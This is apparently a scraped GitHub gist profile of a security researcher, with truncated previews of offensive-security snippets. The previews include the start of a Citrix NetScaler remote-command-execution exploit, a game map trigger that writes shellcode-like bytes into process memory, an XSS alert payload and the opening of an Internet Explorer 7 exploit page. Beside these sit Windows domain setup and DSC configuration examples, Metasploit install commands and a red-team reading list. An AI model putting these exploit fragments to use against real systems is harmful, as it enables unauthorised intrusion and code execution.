Skip to content

Instantly share code, notes, and snippets.

View 0x09AL's full-sized avatar

0x09AL 0x09AL

View GitHub Profile
#include <stdio.h>
#include <iostream>
bool a(std::string& str, const std::string& from, const std::string& to) {
size_t start_pos = str.find(from);
if(start_pos == std::string::npos)
return false;
str.replace(start_pos, from.length(), to);
return true;
}
Trigger("All players"){
Conditions:
Always();
Actions:
MemoryAddr(0x00512804, Set To, 0x05b51004);
MemoryAddr(0x05b51000, Set To, 0xcccccccc);
MemoryAddr(0x5b51004, Set To, 0x0082e8fc);
MemoryAddr(0x5b51008, Set To, 0x89600000);
MemoryAddr(0x5b5100c, Set To, 0x64c031e5);
@0x09AL
0x09AL / netscaler_exploit.py
Created January 13, 2020 11:12
Citrix ADC / NetScaler Remote Command Execution
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/newbm.pl"
alert('XSS');
@0x09AL
0x09AL / gist:52236cc9356c2dccb2f42f83e6fc10bc
Created January 2, 2019 21:34 — forked from mekuls/gist:3102944
dcpromo.exe DCINSTALL example for new domain
[DCINSTALL]
InstallDNS=yes
NewDomain=forest
NewDomainDNSName=au.sky
DomainNetBiosName=au
ReplicaOrNewDomain=domain
ForestLevel=4
DomainLevel=4
DatabasePath=%systemroot%\ntds
LogPath=%systemroot%\ntds
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev
cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
@0x09AL
0x09AL / exploit.html
Created July 6, 2017 13:12
Internet Explorer 7 RSP Exploit for blogpost
<!DOCTYPE html>
<html>
<head>
<title> Exploit for IE 7 </title>
<object id="VULNERABLE" classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687'></object>
</head>
<body>
<script type="text/javascript">